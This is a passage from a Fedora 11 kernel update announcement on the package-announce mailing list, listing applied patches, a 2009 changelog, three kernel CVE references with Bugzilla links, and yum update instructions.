 - linux-2.6-virtio\_blk-dont-bounce-highmem-requests.patch
 - linux-2.6-drivers-char-low-latency-removal.patch
 - linux-2.6-serial-add-txen-test-param.patch
 - linux-2.6-input-wacom-bluetooth.patch
 - linux-2.6-defaults-saner-vm-settings.patch
 - linux-2.6-mm-lru-evict-streaming-io-pages-first.patch
 - linux-2.6-mm-lru-report-vm-flags-in-page-referenced.patch
 - linux-2.6-mm-lru-dont-evict-mapped-executable-pages.patch
 - linux-2.6-utrace.patch
 - linux-2.6-utrace-ftrace.patch
 - linux-2.6-tracehook.patch
\* Mon Aug 10 2009 Jarod Wilson <jarod at redhat.com\>
- Add tunable pad threshold support to lirc\_imon
- Blacklist all iMON devices in usbhid driver so lirc\_imon can bind
- Add new device ID to lirc\_mceusb (#512483)
- Enable IR transceiver on the HD PVR
\* Wed Aug  5 2009 Kyle McMartin <kyle at redhat.com\>
- Update to released 2.6.30.4.
- Drop now-unneeded upstream reverts.
\* Wed Jul 29 2009 Chuck Ebbert <cebbert at redhat.com\>
- Linux 2.6.30.4-rc1
\* Mon Jul 27 2009 Neil Horman <nhorman at redhat.com\>
- Backport xfrm gc\_thresh export code (bz 503124)
\* Fri Jul 24 2009 Kyle McMartin <kyle at redhat.com\>
- CONFIG\_DEFAULT\_MMAP\_MIN\_ADDR=65536 \[i386 x86\_64\], 4096 elsewhere, as
  per defconfigs.
- Blat patches from other tag, now to rebase fixes, splat in the changelog,
  and tag it for building.
\* Fri Jul 24 2009 Kyle McMartin <kyle at redhat.com\>
- Copy over release configs from devel-2.6.30 tag.
- Fix up some spec deviations.
\* Fri Jul 24 2009 Kyle McMartin <kyle at redhat.com\>
- Linux 2.6.30.3 rebase for Fedora 11.
- Fedora 11 2.6.29 branch is on tag private-fedora-11-2\_6\_29\_6.
--------------------------------------------------------------------------------
References:

  \[ 1 \] Bug #554578 - CVE-2010-0003 kernel: infoleak if print-fatal-signals=1
        https://bugzilla.redhat.com/show\_bug.cgi?id=554578
  \[ 2 \] Bug #555217 - CVE-2010-0006 kernel: ipv6: skb\_dst() can be NULL in ipv6\_hop\_jumbo()
        https://bugzilla.redhat.com/show\_bug.cgi?id=555217
  \[ 3 \] Bug #555238 - CVE-2010-0007 kernel: netfilter: ebtables: enforce CAP\_NET\_ADMIN
        https://bugzilla.redhat.com/show\_bug.cgi?id=555238
--------------------------------------------------------------------------------

This update can be installed with the "yum" update program.  Use 
su -c 'yum update kernel' at the command line.
For more information, refer to "Managing Software with yum",
available at http://docs.fedoraproject.org/yum/.

All packages are signed with the Fedora Project GPG key.  More details on the
GPG keys used by the Fedora Project can be found at
http://fedoraproject.org/keys
--------------------------------------------------------------------------------

*   Previous message: Fedora 11 Update: cclive-0.5.8-1.fc11
*   Next message: Fedora 12 Update: mono-2.4.3.1-1.fc12
*   **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

More information about the package-announce mailing list

Tag

#acer